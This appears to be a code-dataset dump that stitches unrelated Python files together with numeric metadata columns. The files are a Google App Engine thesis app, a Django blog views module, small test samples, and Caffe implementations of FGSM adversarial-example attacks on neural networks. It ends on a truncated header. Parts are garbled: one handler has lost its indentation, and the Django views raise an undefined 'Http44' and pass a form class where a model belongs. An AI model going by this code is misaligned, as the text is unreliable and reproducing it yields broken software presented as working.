                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))
class ThesisDetailsHandler(webapp2.RequestHandler):
    """Renders a thesis detail page with adviser, proponents and related theses.

    Admins also get the navigation links and an edit link; regular users get
    the same detail data with a blank edit link.
    """

    def get(self, id):
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    # Admin navigation: every section exposes List + Create links.
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    thesis = thesisentry.get_by_id(int(id))
                    # Resolve adviser and proponent keys to display names.
                    adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
                    adviser = adviser.faculty_full
                    proponents = []
                    for t in thesis.thesis_proponent:
                        p = Student.get_by_id(t.id())
                        proponents.append(p.student_full)
                    # Related theses: any entry sharing at least one tag
                    # (includes this thesis itself).
                    tags = thesis.thesis_tags
                    t = thesisentry.query(thesisentry.thesis_tags.IN(tags)).fetch()
                    edit_link = {}
                    edit_link['Edit Thesis Entry'] = '/thesis/' + id + '/edit'
                    template_values = {
                        'links': links,
                        'edit_link':edit_link,
                        'related':t,
                        'proponents':proponents,
                        'adviser':adviser,
                        'thesis':thesis,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
                    self.response.write(template.render(template_values))
                else:
                    # Non-admin view: same data, no nav links, inert edit link.
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    thesis = thesisentry.get_by_id(int(id))
                    adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
                    adviser = adviser.faculty_full
                    proponents = []
                    for t in thesis.thesis_proponent:
                        p = Student.get_by_id(t.id())
                        proponents.append(p.student_full)
                    tags = thesis.thesis_tags
                    t = thesisentry.query(thesisentry.thesis_tags.IN(tags)).fetch()
                    edit_link = {}
                    edit_link[''] = '#'
                    template_values = {
                        'edit_link':edit_link,
                        'related':t,
                        'proponents':proponents,
                        'adviser':adviser,
                        'thesis':thesis,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
                    self.response.write(template.render(template_values))
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))
class SearchHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
keyword = []
keyword = (self.request.get('search_keyword')).lower().split()
results = thesisentry.query(thesisentry.thesis_tags.IN(keyword)).fetch()
if len(results) == 0:
keyword = []
keyword = (self.request.get('search_keyword')).lower().split()
stud_res = Student.query(Student.student_name_portions.IN(keyword)).fetch()
keys = []
for s in stud_res:
keys.append(s.key)
results = thesisentry.query(thesisentry.thesis_proponent.IN(keys)).fetch()
logging.info(results)
search_results = {}
for r in results:
search_results[r.thesis_title] = r.key.id()
self.response.headers['Content-Type'] = 'application.json'
response = {
'result':'OK',
'data': search_results
}
self.response.out.write(json.dumps(response))
app = webapp2.WSGIApplication([
('/api/thesis', APIHandler),
('/register', RegistrationHandler),
('/login', LoginHandler),
('/home', MainPageHandler),
('/thesis/create', ThesisPageHandler),
('/faculty/create', FacultyHandler),
('/student/create', StudentHandler),
('/university/create', UniversityHandler),
('/college/create', CollegeHandler),
('/department/create', DepartmentHandler),
('/data/import', DataImportHandler),
('/setup', SetupHandler),
('/faculty/list', FacultyListHandler),
('/faculty/api', FacultyAPIHandler),
('/thesis/create/api', ThesisCreateAPI),
('/student/api', StudentsAPIHandler),
('/student/list', StudentListHandler),
('/university/api', UniversityAPIHandler),
('/university/list', UniversityListHandler),
('/college/api', CollegeAPIHandler),
('/college/list', CollegeListHandler),
('/department/api', DepartmentAPIHandler),
('/department/list', DepartmentListHandler),
('/faculty/(.*)/delete', FacultyDeleteHandler),
('/faculty/(.*)', FacultyEditHandler),
('/student/(.*)/delete', StudentDeleteHandler),
('/student/(.*)', StudentEdithandler),
('/university/(.*)/delete', UniversityDeleteHandler),
('/university/(.*)', UniversityEditHandler),
('/college/(.*)/delete', CollegeDeleteHandler),
('/college/(.*)', CollegeEditHandler),
('/department/(.*)/delete', DepartmentDeleteHandler),
('/department/(.*)', DepartmentEditHandler),
('/thesis/(.*)/delete', ThesisDeleteHandler),
('/thesis/(.*)/edit', ThesisEditHandler),
('/thesis/list/all', ThesisListAll),
('/thesis/list/(.*)', ThesisListFilter),
('/thesis/(.*)', ThesisDetailsHandler),
('/search', SearchHandler),
('/', MainPageHandler)
], debug=True)
| 35.733634
| 195
| 0.684157
| 9,347
| 79,150
| 5.604793
| 0.031989
| 0.020921
| 0.030064
| 0.026285
| 0.827651
| 0.788196
| 0.768401
| 0.760976
| 0.751813
| 0.73807
| 0
| 0.001422
| 0.155666
| 79,150
| 2,214
| 196
| 35.749774
| 0.78249
| 0.003588
| 0
| 0.742386
| 0
| 0
| 0.203794
| 0.008129
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029456
| false
| 0
| 0.004993
| 0
| 0.08637
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ffa15fa894dcadf7c895526b37ec77848dd8ff27
| 125
|
py
|
Python
|
python/packages/init_import_things_in_modules/pkg/b.py
|
gregnordin/python-notes_to_self
|
6458271d585f5beabfd18577290de64b82666018
|
[
"MIT"
] | 2
|
2017-04-18T18:41:44.000Z
|
2022-03-19T20:18:25.000Z
|
python/packages/init_import_things_in_modules/pkg/b.py
|
gregnordin/python-notes_to_self
|
6458271d585f5beabfd18577290de64b82666018
|
[
"MIT"
] | 10
|
2021-03-30T13:50:55.000Z
|
2022-01-13T02:54:45.000Z
|
python/packages/init_import_things_in_modules/pkg/b.py
|
gregnordin/python-notes_to_self
|
6458271d585f5beabfd18577290de64b82666018
|
[
"MIT"
] | 2
|
2021-05-07T19:20:08.000Z
|
2021-11-11T20:37:57.000Z
|
class B1():
def __init__(self):
print('Class B1')
class B2():
def __init__(self):
print('Class B2')
| 15.625
| 25
| 0.544
| 16
| 125
| 3.75
| 0.4375
| 0.233333
| 0.366667
| 0.533333
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.296
| 125
| 7
| 26
| 17.857143
| 0.636364
| 0
| 0
| 0.333333
| 0
| 0
| 0.128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
443d493843ada50807333bd3023e027c0e54b8ba
| 465
|
py
|
Python
|
packages/pyright-internal/src/tests/samples/unusedExpression1.py
|
Jasha10/pyright
|
0ce0cfa10fe7faa41071a2cc417bb449cf8276fe
|
[
"MIT"
] | null | null | null |
packages/pyright-internal/src/tests/samples/unusedExpression1.py
|
Jasha10/pyright
|
0ce0cfa10fe7faa41071a2cc417bb449cf8276fe
|
[
"MIT"
] | null | null | null |
packages/pyright-internal/src/tests/samples/unusedExpression1.py
|
Jasha10/pyright
|
0ce0cfa10fe7faa41071a2cc417bb449cf8276fe
|
[
"MIT"
] | null | null | null |
# This sample tests the reportUnusedExpression diagnostic rule.
t = 1
# This should generate a diagnostic.
-4
# This should generate a diagnostic.
4j
# This should generate a diagnostic.
4j + 4
# This should generate a diagnostic.
False
# This should generate a diagnostic.
t == 1
# This should generate a diagnostic.
t != 2
# This should generate a diagnostic.
t <= t
# This should generate a diagnostic.
not t
# This should generate a diagnostic.
None
| 14.53125
| 63
| 0.735484
| 68
| 465
| 5.029412
| 0.264706
| 0.263158
| 0.473684
| 0.5
| 0.804094
| 0.804094
| 0.181287
| 0
| 0
| 0
| 0
| 0.018868
| 0.202151
| 465
| 31
| 64
| 15
| 0.902965
| 0.808602
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
448b2b2849f74b344ea3ac36e9a92c9ea244339b
| 30
|
py
|
Python
|
tests/python/pip/subdir/testpkg/testmod.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 5
|
2021-04-29T21:07:18.000Z
|
2021-09-29T08:46:08.000Z
|
tests/python/pip/subdir/testpkg/testmod.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | null | null | null |
tests/python/pip/subdir/testpkg/testmod.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 1
|
2018-04-07T12:26:21.000Z
|
2018-04-07T12:26:21.000Z
|
print('imported the testmod')
| 15
| 29
| 0.766667
| 4
| 30
| 5.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
922e44bfca7d09a7425b8c945a3d8c917b64336b
| 8,593
|
py
|
Python
|
src/posts/views.py
|
VinceMaku/Django-Website
|
baddfc2433ac00dd15f8d14c69a6c63d54bf3217
|
[
"MIT"
] | null | null | null |
src/posts/views.py
|
VinceMaku/Django-Website
|
baddfc2433ac00dd15f8d14c69a6c63d54bf3217
|
[
"MIT"
] | null | null | null |
src/posts/views.py
|
VinceMaku/Django-Website
|
baddfc2433ac00dd15f8d14c69a6c63d54bf3217
|
[
"MIT"
] | null | null | null |
try:
from urllib import quote_plus #python 2
except:
pass
try:
from urllib.parse import quote_plus #python 3
except:
pass
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from comments.forms import CommentForm,CommentUserForm
from comments.models import Comment,UserComment
from .forms import PostForm,PostUserForm
from .models import Post,UserPost
from accounts.forms import UserRegisterForm
def post_create(request):
if not request.user.is_authenticated():
raise Http44
form = PostForm(request.POST or None, request.FILES or None)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
# message success
messages.success(request, "Successfully Created")
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"form": form,
}
return render(request, "post_form.html", context)
def post_detail(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
instance2= get_object_or_404(UserRegisterForm, slug=slug)
if instance.publish > timezone.now().date() or instance.draft:
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
share_string = quote_plus(instance.content)
initial_data = {
"content_type": instance.get_content_type,
"object_id": instance.id
}
form = CommentForm(request.POST or None, initial=initial_data)
if form.is_valid() and request.user.is_authenticated():
c_type = form.cleaned_data.get("content_type")
content_type = ContentType.objects.get(model=c_type)
obj_id = form.cleaned_data.get('object_id')
content_data = form.cleaned_data.get("content")
parent_obj = None
try:
parent_id = int(request.POST.get("parent_id"))
except:
parent_id = None
if parent_id:
parent_qs = Comment.objects.filter(id=parent_id)
if parent_qs.exists() and parent_qs.count() == 1:
parent_obj = parent_qs.first()
new_comment, created = Comment.objects.get_or_create(
user = request.user,
content_type= content_type,
object_id = obj_id,
content = content_data,
parent = parent_obj,
)
return HttpResponseRedirect(new_comment.content_object.get_absolute_url())
comments = instance.comments
context = {
"title": instance.title,
"instance": instance,
"share_string": share_string,
"comments": comments,
"comment_form":form,
}
return render(request, "post_detail.html", context)
def post_list(request):
today = timezone.now().date()
queryset_list = Post.objects.active() #.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
queryset_list = Post.objects.all()
query = request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(title__icontains=query)|
Q(content__icontains=query)|
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(queryset_list, 3) # Show 25 contacts per page
page_request_var = "page"
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
queryset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
queryset = paginator.page(paginator.num_pages)
context = {
"object_list": queryset,
"title": "List",
"page_request_var": page_request_var,
"today": today,
}
return render(request, "post_list.html", context)
def post_update(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
if not instance.user == request.user:
raise Http404
form = PostForm(request.POST or None, request.FILES or None, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.save()
messages.success(request, "<a href='#'>Item</a> Saved", extra_tags='html_safe')
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": instance.title,
"instance": instance,
"form":form,
}
return render(request, "post_form.html", context)
def post_delete(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
if not instance.user == request.user:
raise Http404
instance.delete()
messages.success(request, "Successfully deleted")
return redirect("posts:list")
def index(request):
today = timezone.now().date()
queryset_list = UserPost.objects.active() #.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
queryset_list = UserPost.objects.all()
query = request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(title__icontains=query)|
Q(content__icontains=query)|
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(queryset_list, 1) # Show 25 contacts per page
page_request_var = "page"
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
queryset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
queryset = paginator.page(paginator.num_pages)
context = {
"object_list": queryset,
"title": "List",
"page_request_var": page_request_var,
"today": today,
}
return render(request, "index.html", context)
def about(request):
return render(request, "about.html")
def types(request):
return render(request, "types.html")
def Userdetail(request, slug=None):
instance = get_object_or_404(UserPost, slug=slug)
if instance.publish > timezone.now().date() or instance.draft:
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
share_string = quote_plus(instance.content)
initial_data = {
"content_type": instance.get_content_type,
"object_id": instance.id
}
form = CommentUserForm(request.POST or None, initial=initial_data)
if form.is_valid() and request.user.is_authenticated():
c_type = form.cleaned_data.get("content_type")
content_type = ContentType.objects.get(model=c_type)
obj_id = form.cleaned_data.get('object_id')
content_data = form.cleaned_data.get("content")
parent_obj = None
try:
parent_id = int(request.POST.get("parent_id"))
except:
parent_id = None
if parent_id:
parent_qs = UserComment.objects.filter(id=parent_id)
if parent_qs.exists() and parent_qs.count() == 1:
parent_obj = parent_qs.first()
new_comment, created = UserComment.objects.get_or_create(
user = request.user,
content_type= content_type,
object_id = obj_id,
content = content_data,
parent = parent_obj,
)
return HttpResponseRedirect(new_comment.content_object.get_absolute_url())
comments = instance.comments
context = {
"title": instance.title,
"instance": instance,
"share_string": share_string,
"comments": comments,
"comment_form":form,
}
return render(request, "post_userdetail.html", context)
def UserCreate(request):
if not request.user.is_authenticated():
raise Http44
form = PostUserForm(request.POST or None, request.FILES or None)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
# message success
messages.success(request, "Successfully Created")
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"form": form,
}
return render(request, "post_userform.html", context)
def Userupdate(request,slug=None):
instance = get_object_or_404(UserPost, slug=slug)
if not instance.user == request.user:
raise Http404
form = PostUserForm(request.POST or None, request.FILES or None, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.save()
messages.success(request, "<a href='#'>Item</a> Saved", extra_tags='html_safe')
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": instance.title,
"instance": instance,
"form":form,
}
return render(request, "post_userform.html", context)
def Userdelete(request, slug=None):
instance = get_object_or_404(UserPost, slug=slug)
if not instance.user == request.user:
raise Http404
instance.delete()
messages.success(request, "Successfully deleted")
return redirect("posts:index")
| 29.327645
| 84
| 0.739672
| 1,160
| 8,593
| 5.291379
| 0.136207
| 0.035842
| 0.025415
| 0.018247
| 0.837406
| 0.837406
| 0.837406
| 0.824699
| 0.824699
| 0.824699
| 0
| 0.009532
| 0.145351
| 8,593
| 292
| 85
| 29.428082
| 0.826253
| 0.043524
| 0
| 0.738589
| 0
| 0
| 0.07981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049793
| false
| 0.008299
| 0.058091
| 0.008299
| 0.182573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
924c01bfcf679f4fe64e1bdf01b6652192a9a535
| 2,119
|
py
|
Python
|
tests/test_input.py
|
DiscoverAI/monty
|
6ab94795535826c6b62bde72d371351d23db11c5
|
[
"MIT"
] | null | null | null |
tests/test_input.py
|
DiscoverAI/monty
|
6ab94795535826c6b62bde72d371351d23db11c5
|
[
"MIT"
] | 13
|
2018-09-28T16:50:53.000Z
|
2018-11-05T21:11:32.000Z
|
tests/test_input.py
|
DiscoverAI/monty
|
6ab94795535826c6b62bde72d371351d23db11c5
|
[
"MIT"
] | null | null | null |
import numpy as np
from monty.input import *
def test_input_function():
batch_size = 3
FLAGS.dataset_path = "fake_path"
noise_input_fn = CorruptedInputFunction(mask_percentage=0,
dataset_path="test_resources/PBMC_test.csv",
batch_size=batch_size,
num_epochs=1,
minimum_expressed_genes=0,
minimum_library_size=0,
num_features=5,
shuffle=False)
x, y = noise_input_fn(None)
expected = data.normalize_op(
tf.constant(
[[2, 1, 0, 1, 0],
[0, 0, 0, 0, 0],
[41, 42, 43, 44, 45]]
, dtype=tf.float32))
assert x.shape == (batch_size, 5)
assert y.shape == (batch_size, 5)
assert np.allclose(y, expected, atol=0.01)
assert np.allclose(x, expected, atol=0.01)
def test_noise_input_function():
batch_size = 3
FLAGS.dataset_path = "fake_path"
noise_input_fn = CorruptedInputFunction(mask_percentage=50,
dataset_path="test_resources/PBMC_test.csv",
batch_size=batch_size,
num_epochs=1,
minimum_expressed_genes=0,
minimum_library_size=0,
num_features=5,
shuffle=False)
x, y = noise_input_fn(None)
expected = data.normalize_op(
tf.constant(
[[2, 1, 0, 1, 0],
[0, 0, 0, 0, 0],
[41, 42, 43, 44, 45]]
, dtype=tf.float32))
assert x.shape == (batch_size, 5)
assert y.shape == (batch_size, 5)
assert np.allclose(y, expected, atol=0.01)
# 8 nonzero values corrupted by 50% mask should leave 4 nonzero values
np.count_nonzero(x) == 4
| 40.75
| 88
| 0.46201
| 226
| 2,119
| 4.110619
| 0.30531
| 0.096878
| 0.025834
| 0.025834
| 0.826695
| 0.826695
| 0.826695
| 0.826695
| 0.826695
| 0.826695
| 0
| 0.064378
| 0.450212
| 2,119
| 51
| 89
| 41.54902
| 0.733047
| 0.032091
| 0
| 0.826087
| 0
| 0
| 0.036115
| 0.02733
| 0
| 0
| 0
| 0
| 0.152174
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
927122b551a36102d636610187623eba9b441b2b
| 6,717
|
py
|
Python
|
attacks.py
|
rajasekharponakala/adversarial-attacks
|
caded4adb6df873d3ed6393c5b372302c2edb930
|
[
"MIT"
] | 84
|
2018-04-13T04:40:02.000Z
|
2021-11-27T07:52:58.000Z
|
attacks.py
|
rajasekharponakala/adversarial-attacks
|
caded4adb6df873d3ed6393c5b372302c2edb930
|
[
"MIT"
] | null | null | null |
attacks.py
|
rajasekharponakala/adversarial-attacks
|
caded4adb6df873d3ed6393c5b372302c2edb930
|
[
"MIT"
] | 32
|
2018-04-23T05:49:10.000Z
|
2021-11-22T05:51:46.000Z
|
"""Generates adversarial example for Caffe networks."""
import numpy as np
import caffe
__author__ = 'Anurag Arnab'
__copyright__ = 'Copyright (c) 2018, Anurag Arnab'
__credits__ = ['Anurag Arnab', 'Ondrej Miksik', 'Philip Torr']
__email__ = 'anurag.arnab@gmail.com'
__license__ = 'MIT'
def fgsm(net, x, eps):
r"""Caffe implementation of the Fast Gradient Sign Method.
This attack was proposed in
net: The Caffe network. Must have its weights initialised already
Makes the following assumptions
- force_backward is set to "true" so that gradients are computed
- Has two inputs: "data" and "label"
- Has two outputs: "output" and "loss"
x: The input data. We will find an adversarial example using this.
- Assume that x.shape = net.blobs['data'].shape
eps: l_{\infty} norm of the perturbation that will be generated
Returns the adversarial example, as well as just the pertubation
(adversarial example - original input)
"""
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
net.blobs['data'].data[0,:,:,:] = np.squeeze(x)
net.blobs['label'].data[...] = dummy_label
net.forward()
net_prediction = net.blobs['output'].data[0].argmax(axis=0).astype(np.uint32)
net.blobs['label'].data[...] = net_prediction
data_diff = net.backward(diffs=['data'])
grad_data = data_diff['data']
signed_grad = np.sign(grad_data) * eps
adversarial_x = x + signed_grad
return adversarial_x, signed_grad
def IterativeFGSM(net, x, eps, num_iters=-1, alpha=1, do_stop_max_pert=False):
r"""Iterative FGSM.
net: The caffe net. See the docstring for "fgsm" for the assumptions
x: The input image
eps: l_{\infty} norm of the perturbation
num_iters: The number of iterations to run for. If it is negative, the formula
used from Kurakin et al. Adversarial Machine Learning at Scale ICLR 2016 is used
do_stop_max_pert: If this is true, the optimisation runs until either the max-norm
constraint is reached, or num_iters is reached.
"""
clip_min = x - eps
clip_max = x + eps
if num_iters <= 0:
num_iters = np.min([eps + 4, 1.25*eps]) # Used in Kurakin et al. ICLR 2016
num_iters = int(np.max([np.ceil(num_iters), 1]))
adversarial_x = x
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
net.blobs['label'].data[...] = dummy_label
for i in range(num_iters):
net.blobs['data'].data[0,:,:,:] = np.squeeze(adversarial_x)
net.forward()
net_prediction = net.blobs['output'].data[0].argmax(axis=0).astype(np.uint32)
if i == 0:
net.blobs['label'].data[...] = net_prediction
data_diff = net.backward(diffs=['data'])
grad_data = data_diff['data']
signed_grad = np.sign(grad_data) * alpha
adversarial_x = np.clip(adversarial_x + signed_grad, clip_min, clip_max)
adv_perturbation = adversarial_x - x
if do_stop_max_pert:
max_pert = np.max(np.abs(adv_perturbation))
if max_pert >= eps: # Due to floating point inaccuracies, need >= instead of just ==
print "Stopping after {} iterations: Max norm reached".format(i+1)
break
return adversarial_x, adv_perturbation
def IterativeFGSMLeastLikely(net, x, eps, num_iters=-1, alpha=1, do_stop_max_pert=False):
r"""Iterative FGSM Least Likely.
This attack was proposed in Kurakin et al. Adversarial Machine Learning at Scale. ICLR 2016.
net: The caffe net. See the docstring for "fgsm" for the assumptions
x: The input image
eps: l_{\infty} norm of the perturbation
num_iters: The number of iterations to run for. If it is negative, the formula
used from Kurakin et al. is used.
do_stop_max_pert: If this is true, the optimisation runs until either the max-norm
constraint is reached, or num_iters is reached.
"""
clip_min = x - eps
clip_max = x + eps
if num_iters <= 0:
num_iters = np.min([eps + 4, 1.25*eps]) # Used in Kurakin et al. ICLR 2016
num_iters = int(np.max([np.ceil(num_iters), 1]))
adversarial_x = x
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
for i in range(num_iters):
net.blobs['data'].data[0,:,:,:] = np.squeeze(adversarial_x)
net.blobs['label'].data[...] = dummy_label
net.forward()
net_predictions = np.argsort(-net.blobs['output'].data[0], axis=0)
target_idx = net_predictions.shape[0] - 1
target = net_predictions[target_idx]
target = np.squeeze(target)
net.blobs['label'].data[...] = target
grads = net.backward(diffs=['data'])
grad_data = grads['data']
signed_grad = np.sign(grad_data) * alpha
adversarial_x = np.clip(adversarial_x - signed_grad, clip_min, clip_max)
adv_perturbation = adversarial_x - x
if do_stop_max_pert:
max_pert = np.max(np.abs(adv_perturbation))
if max_pert >= eps: # Due to floating point inaccuracies, need >= instead of just ==
print "Stopping after {} iterations: Max norm reached".format(i+1)
break
return adversarial_x, adv_perturbation
def fgsm_targetted(net, x, eps, target_idx):
r"""Targetted FGSM attack.
net: The caffe net. See the docstring for "fgsm" for the assumptions
x: The input image
eps: l_{\infty} norm of the perturbation
target_idx: The class that the adversarial attack is targetted for,
Note, that this is not the class id, but rather the relative ranking (0 indexed.
In other words, target_idx=1 means that the target will be the class
that was predicted with the second highest confidence.
"""
shape_label = net.blobs['label'].data.shape
dummy_label = np.zeros(shape_label)
net.blobs['data'].data[0,:,:,:] = np.squeeze(x)
net.blobs['label'].data[...] = dummy_label
net.forward()
net_predictions = np.argsort(-net.blobs['output'].data[0], axis=0)
if (target_idx < 0 or target_idx > net_predictions.shape[0]):
raise ValueError("Target idx should be an integer in the range [0,num_classes-1]")
target = net_predictions[target_idx]
target = np.squeeze(target)
net.blobs['label'].data[...] = target
grads = net.backward(diffs=['data'])
grad_data = grads['data']
signed_grad = np.sign(grad_data) * eps
adversarial_x = x - signed_grad
return adversarial_x, -signed_grad
| 37.316667
| 99
| 0.647313
| 959
| 6,717
| 4.376434
| 0.208551
| 0.040029
| 0.037169
| 0.048606
| 0.756254
| 0.745294
| 0.728139
| 0.720991
| 0.720991
| 0.720991
| 0
| 0.01236
| 0.241179
| 6,717
| 179
| 100
| 37.52514
| 0.811065
| 0.028435
| 0
| 0.742268
| 1
| 0
| 0.093563
| 0.005264
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.020619
| null | null | 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
928ae293ef9337415a07c105c356e8abf13bf7ec
| 5,736
|
py
|
Python
|
testproject/testapp/tests/test_handlers_clean_models.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1
